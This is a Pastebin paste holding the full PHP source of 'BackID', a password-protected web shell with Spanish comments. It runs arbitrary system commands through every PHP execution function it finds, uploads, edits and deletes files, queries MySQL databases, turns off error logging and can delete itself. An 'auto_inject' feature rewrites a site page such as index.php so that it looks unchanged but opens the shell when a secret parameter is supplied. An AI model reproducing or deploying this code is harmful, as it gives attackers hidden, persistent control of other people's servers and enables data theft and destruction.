Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- error_reporting(0);
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('max_execution_time',0);
- @set_time_limit(0);
- @set_magic_quotes_runtime(0);
- define('VERSION', '0.2');
- define('NAME', 'BackID - shell v'.VERSION);
- define('TITLE', 'BackID v0.2'); //podes cambiarlo por lo que quieras que aparezca en la index :)
- if( get_magic_quotes_gpc() ) {
- function stripslashes_array($array) {
- return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
- }
- $_POST = stripslashes_array($_POST);
- }
- $pass = "contrasena";
- //+--+--+--+--+--+--+--+--+--+--+--+--+-- Termina Configuracion jejejeje +-++-++-++-++-++-++-++-++-++-++-++-+-//
- session_start();
- if(isset($_GET['exit'])) { session_unset(); unset($_SESSION); session_destroy(); die("<script> window.location='" . $_SERVER['SCRIPT_NAME'] . "'; </script>"); }
- if(!(isset($_SESSION['logged']) && $_SESSION['logged'] != ""))
- {
- if($_POST['password'] == $pass)
- {
- session_start();
- $_SESSION['logged'] = "yessss";
- header("Location: ".$_SERVER['SCRIPT_NAME']);
- }
- ?>
- <html>
- <head>
- <title><?php echo TITLE; ?></title>
- <style type="text/css">
- @import url(http://fonts.googleapis.com/css?family=Iceland);
- .matrix { font-family: Iceland, Lucida Console, Courier, Monotype; font-size:14pt; text-align:center; width:15px; padding:0px; margin:0px;}
- </style>
- <script type="text/javascript" language="JavaScript">
- <!--
- var rows=21;
- var speed=3;
- var reveal=3;
- var effectalign="default";
- var w3c=document.getElementById && !window.opera;;
- var ie45=document.all && !window.opera;
- var ma_tab, matemp, ma_bod, ma_row, x, y, columns, ma_txt, ma_cho;
- var m_coch=new Array();
- var m_copo=new Array();
- window.onload=function() {
- if (!w3c && !ie45) return
- var matrix=(w3c)?document.getElementById("matrix"):document.all["matrix"];
- ma_txt=(w3c)?matrix.firstChild.nodeValue:matrix.innerHTML;
- ma_txt=" "+ma_txt+" ";
- columns=ma_txt.length;
- if (w3c) {
- while (matrix.childNodes.length) matrix.removeChild(matrix.childNodes[0]);
- ma_tab=document.createElement("table");
- ma_tab.setAttribute("border", 0);
- ma_tab.setAttribute("align", effectalign);
- ma_tab.style.backgroundColor="#000000";
- ma_bod=document.createElement("tbody");
- for (x=0; x<rows; x++) {
- ma_row=document.createElement("tr");
- for (y=0; y<columns; y++) {
- matemp=document.createElement("td");
- matemp.setAttribute("id", "Mx"+x+"y"+y);
- matemp.className="matrix";
- matemp.appendChild(document.createTextNode(String.fromCharCode(160)));
- ma_row.appendChild(matemp);
- }
- ma_bod.appendChild(ma_row);
- }
- ma_tab.appendChild(ma_bod);
- matrix.appendChild(ma_tab);
- } else {
- ma_tab='<ta'+'ble align="'+effectalign+'" border="0" style="background-color:#000000">';
- for (var x=0; x<rows; x++) {
- ma_tab+='<t'+'r>';
- for (var y=0; y<columns; y++) {
- ma_tab+='<t'+'d class="matrix" id="Mx'+x+'y'+y+'"> </'+'td>';
- }
- ma_tab+='</'+'tr>';
- }
- ma_tab+='</'+'table>';
- matrix.innerHTML=ma_tab;
- }
- ma_cho=ma_txt;
- for (x=0; x<columns; x++) {
- ma_cho+=String.fromCharCode(32+Math.floor(Math.random()*94));
- m_copo[x]=0;
- }
- ma_bod=setInterval("mytricks()", speed);
- }
- function mytricks() {
- x=0;
- for (y=0; y<columns; y++) {
- x=x+(m_copo[y]==100);
- ma_row=m_copo[y]%100;
- if (ma_row && m_copo[y]<100) {
- if (ma_row<rows+1) {
- if (w3c) {
- matemp=document.getElementById("Mx"+(ma_row-1)+"y"+y);
- matemp.firstChild.nodeValue=m_coch[y];
- }
- else {
- matemp=document.all["Mx"+(ma_row-1)+"y"+y];
- matemp.innerHTML=m_coch[y];
- }
- matemp.style.color="#33ff66";
- matemp.style.fontWeight="bold";
- }
- if (ma_row>1 && ma_row<rows+2) {
- matemp=(w3c)?document.getElementById("Mx"+(ma_row-2)+"y"+y):document.all["Mx"+(ma_row-2)+"y"+y];
- matemp.style.fontWeight="normal";
- matemp.style.color="#00ff00";
- }
- if (ma_row>2) {
- matemp=(w3c)?document.getElementById("Mx"+(ma_row-3)+"y"+y):document.all["Mx"+(ma_row-3)+"y"+y];
- matemp.style.color="#009900";
- }
- if (ma_row<Math.floor(rows/2)+1) m_copo[y]++;
- else if (ma_row==Math.floor(rows/2)+1 && m_coch[y]==ma_txt.charAt(y)) zoomer(y);
- else if (ma_row<rows+2) m_copo[y]++;
- else if (m_copo[y]<100) m_copo[y]=0;
- }
- else if (Math.random()>0.9 && m_copo[y]<100) {
- m_coch[y]=ma_cho.charAt(Math.floor(Math.random()*ma_cho.length));
- m_copo[y]++;
- }
- }
- if (x==columns) clearInterval(ma_bod);
- }
- function zoomer(ycol) {
- var mtmp, mtem, ytmp;
- if (m_copo[ycol]==Math.floor(rows/2)+1) {
- for (ytmp=0; ytmp<rows; ytmp++) {
- if (w3c) {
- mtmp=document.getElementById("Mx"+ytmp+"y"+ycol);
- mtmp.firstChild.nodeValue=m_coch[ycol];
- }
- else {
- mtmp=document.all["Mx"+ytmp+"y"+ycol];
- mtmp.innerHTML=m_coch[ycol];
- }
- mtmp.style.color="#33ff66";
- mtmp.style.fontWeight="bold";
- }
- if (Math.random()<reveal) {
- mtmp=ma_cho.indexOf(ma_txt.charAt(ycol));
- ma_cho=ma_cho.substring(0, mtmp)+ma_cho.substring(mtmp+1, ma_cho.length);
- }
- if (Math.random()<reveal-1) ma_cho=ma_cho.substring(0, ma_cho.length-1);
- m_copo[ycol]+=199;
- setTimeout("zoomer("+ycol+")", speed);
- }
- else if (m_copo[ycol]>200) {
- if (w3c) {
- mtmp=document.getElementById("Mx"+(m_copo[ycol]-201)+"y"+ycol);
- mtem=document.getElementById("Mx"+(200+rows-m_copo[ycol]--)+"y"+ycol);
- }
- else {
- mtmp=document.all["Mx"+(m_copo[ycol]-201)+"y"+ycol];
- mtem=document.all["Mx"+(200+rows-m_copo[ycol]--)+"y"+ycol];
- }
- mtmp.style.fontWeight="normal";
- mtem.style.fontWeight="normal";
- setTimeout("zoomer("+ycol+")", speed);
- }
- else if (m_copo[ycol]==200) m_copo[ycol]=100+Math.floor(rows/2);
- if (m_copo[ycol]>100 && m_copo[ycol]<200) {
- if (w3c) {
- mtmp=document.getElementById("Mx"+(m_copo[ycol]-101)+"y"+ycol);
- mtmp.firstChild.nodeValue=String.fromCharCode(160);
- mtem=document.getElementById("Mx"+(100+rows-m_copo[ycol]--)+"y"+ycol);
- mtem.firstChild.nodeValue=String.fromCharCode(160);
- }
- else {
- mtmp=document.all["Mx"+(m_copo[ycol]-101)+"y"+ycol];
- mtmp.innerHTML=String.fromCharCode(160);
- mtem=document.all["Mx"+(100+rows-m_copo[ycol]--)+"y"+ycol];
- mtem.innerHTML=String.fromCharCode(160);
- }
- setTimeout("zoomer("+ycol+")", speed);
- }
- }
- // -->
- </script>
- </head>
- <body style="background:black;">
- <br>
- <center><div id="matrix"><?php echo TITLE; ?></div></center>
- <div style="position: absolute; height: 30px; margin: 0px; padding: 0px; text-align: center; top: 100%; margin-top: -30px;">
- <form action="<?php echo "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."?".$_SERVER['QUERY_STRING']; ?>" method="post">
- <input type="password" name="password" style="border : none; background-color: #000; color: #0F0;">
- </form>
- </div>
- </body>
- </html>
- <?php
- }
- else
- {
- if(isset($_GET['phpinfo']))
- {
- echo "<a href='".$_SERVER['SCRIPT_NAME']."'>Volver</a>";
- die (phpinfo());
- }
- function auto_inject($p)
- {
- $password = "bk_sh";
- $pwd = "\$_GET[\"".$password."\"]";
- $sess = "\$_SESSION[\"".$password."\"]";
- $valid = "\"$password\"";
- $dat_inyectado = file_exists($p)?cargar_datos($p):"";
- $dat_shell = cargar_datos(__FILE__);
- $inyeccion = <<<inyec
- <?php
- error_reporting(0);
- session_start();
- if(isset($pwd))
- {
- $sess = $valid;
- }
- else if(!isset($sess))
- {
- unset($sess);
- session_unset();
- session_destroy();
- }
- if(!(isset($sess) && $sess == $valid))
- {
- ?>
- $dat_inyectado
- <?php
- }
- else
- {
- ?>
- $dat_shell
- <?php
- }
- ?>
- inyec;
- if(file_exists($p))
- {
- $finyect = fopen($p, "w");
- if(fwrite($finyect, $inyeccion)) {
- echo "Inyectado correctamente, entra con: ".$p."?".$password;
- }
- else
- {
- echo "No lo logre :/ tocara manualmente";
- }
- fclose($finyect);
- }
- else
- {
- echo "No exite ".$p." se creara el archivo y debe entrar asi: ".$p."?".$password;
- echo "<br>inyectando<br>";
- $finyect = fopen($p, "w");
- if(fwrite($finyect, $inyeccion)) {
- echo "Inyectado correctamente, entra con: ".$p."?".$password;
- }
- else
- {
- echo "No lo logre :/ tocara manualmente";
- }
- fclose($finyect);
- }
- }
- function cargar_datos($archivo_c)
- {
- $archivo_o = fopen($archivo_c, "r");
- $dat_archivo = "";
- while(!feof($archivo_o))
- {
- global $fs_ln;
- $line = fgets($archivo_o);
- if($fs_ln == "") { $fs_ln = $line; }
- $dat_archivo .= $line;
- }
- fclose($archivo_o);
- return $dat_archivo;
- }
- function exec_all($command)
- {
- $output = '';
- if(function_exists('exec'))
- {
- exec($command,$output);
- $output = join("\n",$output);
- }
- else if(function_exists('shell_exec'))
- {
- $output = shell_exec($command);
- }
- else if(function_exists('popen'))
- {
- $handle = popen($command , "r"); // Open the command pipe for reading
- if(is_resource($handle))
- {
- if(function_exists('fread') && function_exists('feof'))
- {
- while(!feof($handle))
- {
- $output .= fread($handle, 512);
- }
- }
- else if(function_exists('fgets') && function_exists('feof'))
- {
- while(!feof($handle))
- {
- $output .= fgets($handle,512);
- }
- }
- }
- pclose($handle);
- }
- else if(function_exists('system'))
- {
- ob_start(); //start output buffering
- system($command);
- $output = ob_get_contents(); // Get the ouput
- ob_end_clean(); // Stop output buffering
- }
- else if(function_exists('passthru'))
- {
- ob_start(); //start output buffering
- passthru($command);
- $output = ob_get_contents(); // Get the ouput
- ob_end_clean(); // Stop output buffering
- }
- else if(function_exists('proc_open'))
- {
- $descriptorspec = array(
- 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
- );
- $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'
- if(is_resource($handle))
- {
- if(function_exists('fread') && function_exists('feof'))
- {
- while(!feof($pipes[1]))
- {
- $output .= fread($pipes[1], 512);
- }
- }
- else if(function_exists('fgets') && function_exists('feof'))
- {
- while(!feof($pipes[1]))
- {
- $output .= fgets($pipes[1],512);
- }
- }
- }
- pclose($handle);
- }
- else
- {
- $output = "Ups moita security xDDDD!!!";
- }
- return(htmlspecialchars($output));
- }
- function eliminarDir($carpeta)
- {
- foreach(glob($carpeta . "/*") as $archivos_carpeta)
- {
- echo $archivos_carpeta;
- if (is_dir($archivos_carpeta))
- {
- eliminarDir($archivos_carpeta);
- }
- else
- {
- unlink($archivos_carpeta);
- }
- }
- rmdir($carpeta);
- }
- function contar_datos($carp)
- {
- $carp = str_replace(' ', ' ',$carp);
- $carp = str_replace('\\', '/',$carp);
- $carpt = opendir($carp);
- $tot = 0;
- while($list = readdir($carpt)){
- if(ucwords($list) != ".." && ucwords($list) != ".")
- {
- $tot++;
- }
- }
- closedir($carpt);
- return $tot;
- }
- function size($path, $formated = true, $retstring = null){
- if(!is_dir($path) || !is_readable($path)){
- if(is_file($path) || file_exists($path)){
- $size = filesize($path);
- } else {
- return false;
- }
- } else {
- $path_stack[] = $path;
- $size = 0;
- do {
- $path = array_shift($path_stack);
- $handle = opendir($path);
- while(false !== ($file = readdir($handle))) {
- if($file != '.' && $file != '..' && is_readable($path . DIRECTORY_SEPARATOR . $file)) {
- if(is_dir($path . DIRECTORY_SEPARATOR . $file)){ $path_stack[] = $path . DIRECTORY_SEPARATOR . $file; }
- $size += filesize($path . DIRECTORY_SEPARATOR . $file);
- }
- }
- closedir($handle);
- } while (count($path_stack)> 0);
- }
- if($formated){
- $sizes = array('B', 'kB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB');
- if($retstring == null) { $retstring = '%01.2f %s'; }
- $lastsizestring = end($sizes);
- foreach($sizes as $sizestring){
- if($size <1024){ break; }
- if($sizestring != $lastsizestring){ $size /= 1024; }
- }
- if($sizestring == $sizes[0]){ $retstring = '%01d %s'; } // los Bytes normalmente no son fraccionales
- $size = sprintf($retstring, $size, $sizestring);
- }
- return $size;
- }
- if(isset($_POST['upload'])){
- if(!isset($_POST['dir']) || $_POST['dir'] == "")
- {
- echo "<script>alert('Directorio please');</script>";
- }
- else
- {
- $fname = $_FILES['file_name']['name'];
- $direc = $_POST['dir'];
- if(!move_uploaded_file($_FILES['file_name']['tmp_name'], $direc.$fname))
- {
- echo "<script>alert('Error subiendo archivo');</script>";
- }
- else
- {
- echo "<script>alert('Archivo subido satisfactoriamente');</script>";
- }
- }
- }
- if(isset($_GET['boom']))
- {
- @unlink($_SERVER['SCRIPT_NAME']);
- }
- ?>
- <!DOCTYPE html>
- <html>
- <head>
- <title><?php echo NAME; ?></title>
- <script type="text/javascript" src="http://code.jquery.com/jquery.min.js"></script>
- <style type="text/css">
- @import url(http://fonts.googleapis.com/css?family=Iceland);
- * { font-family: Iceland; color: #0F0; }
- body { background-color: #000; }
- #main { border : #0F0 solid 1px; border-color: #00ff00; position: relative; }
- #pie { position: absolute; bottom: 0px; }
- body,a:link { background-color: #000000; color: #00F; font-size: small; font-family: Iceland, "Courier New"; cursor: crosshair; }
- a:link,a:visited,a:active { color: #00F; font: normal 15px Iceland, Verdana, Arial, Helvetica, sans-serif; text-decoration: none; }
- #title { font-family: IceLand; font-size: 30px; text-align: center; }
- input, textarea { background-color: #000; color: #0F0; padding: 5px; font-size: 15px; }
- td { border-bottom: 2px dotted #0F0; text-align: center; padding: 5px; margin: 3px; }
- </style>
- <script type="text/javascript">
- $(function()
- {
- $('.it_menu').click(function(){
- $('.active').removeClass('it_menu active').addClass('it_menu');
- $(this).addClass('active');
- });
- });
- </script>
- </head>
- <body>
- <div id="main">
- <?php echo " ". php_uname() . " --- | --- " . getenv('SERVER_SOFTWARE') . " --- | --- <a href=?phpinfo> ver phpinfo </a>"; ?>
- <h1 id="title"><?php echo NAME; ?></h1>
- <div id="content">
- <center>
- <table style="border: #0F0 1px solid; width: 95%; padding: 3px;">
- <tr>
- <td style="width: 50%;">
- <form action="<?php echo $_SERVER['SCRIPT_NAME']; ?>" method="get">
- Abrir carpeta<br><input type="text" name="d" value="<?php echo getcwd(); ?>" /> <input type="submit" value="Ir a" name="btn_func">
- </form>
- </td>
- <td style="width: 50%;">
- <form enctype="multipart/form-data" action="<?php echo $_SERVER["PHP_SELF"]; ?>" method="post">
- <input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
- upload file:<input name="file_name" type="file">
- <br>to dir: <input type="text" name="dir" value="./"> <input type="submit" name="upload" value="upload">
- </form>
- </td>
- </tr>
- <tr>
- <td colspan="2">
- Execute MySQL Query:<br>
- <form action="<?php echo $_SERVER['SCRIPT_NAME']; ?>" method="post" >
- host:<input type="text" name="host" value="localhost"> user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
- database: <input type="text" name="db"> query: <input type="text" name="mquery"> <input type="submit" value="execute">
- </form>
- </td>
- </tr>
- <tr>
- <td style="width: 50%;">
- <center>
- <?php
- if(isset($_GET['archivo'], $_GET['action']) && ($_GET['archivo'] != "" && $_GET['action'] == "deleteD"))
- {
- eliminarDir($_GET['archivo']);
- echo "Carpeta eliminada!!!";
- }
- else if(isset($_GET['archivo'], $_GET['action']) && ($_GET['archivo'] != "" && $_GET['action'] == "deleteA"))
- {
- unlink($_GET['archivo']);
- echo "Archivo eliminado!!!";
- }
- ?>
- <table style="width: 95%; border: 1px #0F0 dashed;">
- <tr>
- <td colspan="4" style="color: #000; background-color: #0F0; margin: 3px; height: 20px;">
- <strong style="color: #000;">Archivos y Directorios</strong>
- </td>
- </tr>
- <tr>
- <td style="color: #000; background-color: #0F0; margin: 3px; height: 20px;">
- <strong style="color: #000;">Nombre</strong>
- </td>
- <td style="color: #000; background-color: #0F0; margin: 3px; height: 20px;">
- <strong style="color: #000;">Tamaño</strong>
- </td>
- <td style="color: #000; background-color: #0F0; margin: 3px; height: 20px;">
- <strong style="color: #000;">Editar</strong>
- </td>
- <td style="color: #000; background-color: #0F0; margin: 3px; height: 20px;">
- <strong style="color: #000;">Eliminar</strong>
- </td>
- </tr>
- <?php
- $dir = (stristr(php_uname('s'), 'Windows'))?"C:":"/";
- $dir = (isset($_GET['d']) && $_GET['d'] != "")?$_GET['d']:$dir;
- if(@$handle = opendir($dir))
- {
- while (false !== ($archivo = readdir($handle)))
- {
- echo "<tr>";
- if($archivo == '.')
- {
- echo "<td><a href=\"?d=.\">$archivo</a><br></td>";
- echo "<td></td>";
- echo "<td></td>";
- echo "<td></td>";
- }
- elseif($archivo == '..')
- {
- if($dir != '.')
- {
- $carpetas = explode("/",$dir);
- array_pop($carpetas);
- $dir2 = join("/",$carpetas);
- echo "<td colspan='4'><a href=\"?d=$dir2\">$archivo</a></td>";
- }
- }
- elseif(is_dir($dir."/".$archivo))
- {
- echo "<td><a href='?d=".$dir."/".$archivo."'>".$archivo."</a></td>";
- echo "<td>".contar_datos($dir."/".$archivo)." archv(s)</td>";
- echo "<td colspan='2'><a onclick='return confirm(\"Eliminar Carpeta?\");' href='?action=deleteD&archivo=".$dir."/".$archivo."'>Eliminar</a></td>";
- }
- else
- {
- echo "<td>".$archivo."</td>";
- echo "<td>".size($dir."/".$archivo)."</td>";
- echo "<td><a href='?action=edit&archivo=".$dir."/".$archivo."'>Modificar</a></td>";
- echo "<td><a onclick='return confirm(\"Eliminar Archivo?\");' href='?action=deleteA&archivo=".$dir."/".$archivo."'>Eliminar</a></td>";
- }
- echo "</tr>";
- //echo "<i>".$dir."/".$archivo."</i>";
- }
- }
- else
- {
- echo "<span style='color: #F00; font-weight: bolder;'>Error: el directorio $dir no existe...";
- }
- ?>
- </table>
- </center>
- </td>
- <td style="width: 50%; margin-top: 0px;">
- <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST">
- <input type="text" name="pag" value="index.php" title="A donde me inyecto?" /> <input type="submit" name="Inject" value="Inject">
- </form>
- <p style="color: #F00;">
- <?php
- if(isset($_POST["Inject"]) && $_POST["Inject"] == "Inject")
- {
- $pag_iny = isset($_POST['pag'])?$_POST['pag']:"index.php";
- unset($_POST);
- auto_inject($pag_iny);
- }
- ?>
- </p>
- <br><br>
- <?php
- if((isset($_POST['btn_func']) && $_POST['btn_func'] == "Guardar") && (isset($_POST['multilinea']) && $_POST['multilinea'] != "") && (isset($_POST['ruta']) && $_POST['ruta'] != ""))
- {
- $guardar_arc = fopen($_POST['ruta'], 'w');
- if(fwrite($guardar_arc, $_POST['multilinea']))
- {
- echo "Archivo guardado!!!";
- }
- else
- {
- echo "<span style='color: #F00;'>No se pudo guardar!!!</span>";
- }
- }
- ?>
- Crear y/o Modificar Archivos
- <br><br>
- <form action="<?php echo $_SERVER['SCRIPT_NAME']; ?>" method="post">
- <textarea id="multilinea" name="multilinea" style="width: 95%; height: 150px; resize: none;" readonly="readonly"><?php if(isset($_GET['archivo'], $_GET['action']) && ($_GET['archivo'] != "" && $_GET['action'] == "edit")) { $archivo = file_get_contents($_GET['archivo']); $archivo = ucfirst($archivo); echo htmlentities($archivo); } ?></textarea>
- <br><input type="text" name="ruta" value="<?php if(isset($_GET['archivo']) && $_GET['archivo'] != '') { echo $_GET['archivo']; } ?>" style="width: 50%;"> <input type="button" onclick="$(function(){ $('#multilinea').removeAttr('readonly'); });" name="btn_func" id="btn_edit" value="Editar"> | <input type="submit" name="btn_func" id="btn_save" value="Guardar">
- </form>
- <br><br>
- Ejecutar Comandos por medio de System
- <br><br>
- <form action="<?php echo $_SERVER['SCRIPT_NAME']; ?>" method="post">
- <textarea id="multilinea" name="multilinea" style="width: 95%; height: 150px; resize: none;" readonly="readonly">
- <?php
- if(isset($_POST['cmd_text'], $_POST['btn_func']) && ($_POST['cmd_text'] != "" && $_POST['btn_func'] == "System"))
- {
- $comando = $_POST['cmd_text'];
- $check = exec_all($comando);
- echo $check;
- }
- if(isset($_POST['mquery']))
- {
- $host=$_POST['host'];
- $usr=$_POST['usr'];
- $passwd=$_POST['passwd'];
- $db=$_POST['db'];
- $mquery=$_POST['mquery'];
- mysql_connect($host, $usr, $passwd);
- echo mysql_error()?"Error: " . mysql_error():"Conectado\n";
- mysql_select_db($db);
- echo mysql_error()?"Error: " . mysql_error():"DB seleccionada\n\n";
- $result = mysql_query($mquery);
- if($result)
- {
- while($line = mysql_fetch_array($result,MYSQL_ASSOC))
- {
- print_r ($line);
- }
- }
- //while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);
- //mysql_free_result($result);
- //die;
- }
- ?>
- </textarea>
- <br><input type="text" name="cmd_text" value="<?php echo (isset($_POST['cmd']))?$_POST['cmd']:''; ?>" style="width: 80%;"> | <input type="submit" name="btn_func" id="btn_save" value="System">
- </form>
- </td>
- </tr>
- </table>
- <div style="background-color: #000; border: 1px dashed #F00; position: relative; width: 95%; height: 30px; bottom: 0px; cursor: pointer; text-align:center;" >by BacktrackFire && kid_goth<br>| HackxCrack |</div>
- <center>
- </div>
- <div style="background-color: #F00; position: fixed; width: 30px; height: 30px; top: 50%; right: 0px; padding-top: 10px; cursor: pointer;" onclick="window.location='<?php echo $_SERVER['SCRIPT_NAME']; ?>'">Act</div>
- <div style="background-color: #F00; position: fixed; width: 30px; height: 30px; top: 50%; margin-top: 31px; right: 0px; padding-top: 10px; cursor: pointer;" onclick="window.location='<?php echo $_SERVER['SCRIPT_NAME']."?exit"; ?>'">Exit</div>
- <div style="background-color: #F00; position: fixed; width: 30px; height: 30px; top: 50%; margin-top: 31px; right: 0px; padding-top: 10px; cursor: pointer;" onclick="window.location='<?php echo $_SERVER['SCRIPT_NAME']."?boom"; ?>'">Boom</div>
- </body>
- </html>
- <?php
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement